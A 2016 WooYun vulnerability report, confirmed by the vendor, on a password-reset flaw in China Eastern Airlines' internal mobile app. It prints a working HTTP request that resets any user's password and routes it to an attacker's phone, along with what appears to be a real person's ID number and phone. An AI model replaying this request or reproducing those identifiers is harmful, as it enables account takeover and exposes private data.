当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2016-0206958
漏洞标题:
中国东方航空股份有限公司某内部APP设计缺陷任意用户密码重置等
相关厂商:
中国东方航空股份有限公司
漏洞作者:
高小厨
提交时间:
2016-05-10 10:23
修复时间:
2016-06-24 11:00
公开时间:
2016-06-24 11:00
漏洞类型:
设计缺陷/逻辑错误
危害等级:
自评Rank:
15
漏洞状态:
厂商已经确认
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2016-05-10: 细节已通知厂商并且等待厂商处理中
2016-05-10: 厂商已经确认,细节仅向厂商公开
2016-05-20: 细节向核心白帽子及相关领域专家公开
2016-05-30: 细节向普通白帽子公开
2016-06-09: 细节向实习白帽子公开
2016-06-24: 细节向公众公开

简要描述:

你喜欢的空姐,这里都有

详细说明:

在这里http://apps.ceair.com下载掌上东航APP
1、涉及多个系统

2.png


2、重置密码试试
随意使用用户名,手机号,身份证,然后输入任意验证码尝试,发现并未进行发包,判断验证码应该进行本地校验
果然,拿用户yanshouzhen,身份证号:140102196008226036等多个信息进行尝试,发现手机验证码和手机号都返回了,然并卵,最后新的密码会发到用户手机上
但是发现了可以的数据包,发现可以修改任意用户的密码,只要遍历id即可,密码就会发的自己的手机上

POST /mas/appCenter/accountService?method=resetPassword HTTP/1.1
Host: mumobile30.ceair.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
User-Agent: 
Content-Length: 31
Accept-Encoding: gzip
Connection: close
uid=wangwei&mobile=13185745416


111.png


3、修改手机号为自己的

5.jpg


漏洞证明:

4、证明(各种个人信息)

3.png


5、证明(可进行办公邮件查收等等,由于是统一办公体系web上的也能登录)

4.png


6、仅证明危害存在,未深入,未做违法操作

修复方案:

内部APP是企业安全防御边界

版权声明:转载请注明来源 高小厨@乌云

>

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2016-05-10 10:57

厂商回复:

十分感谢!

最新状态:

暂无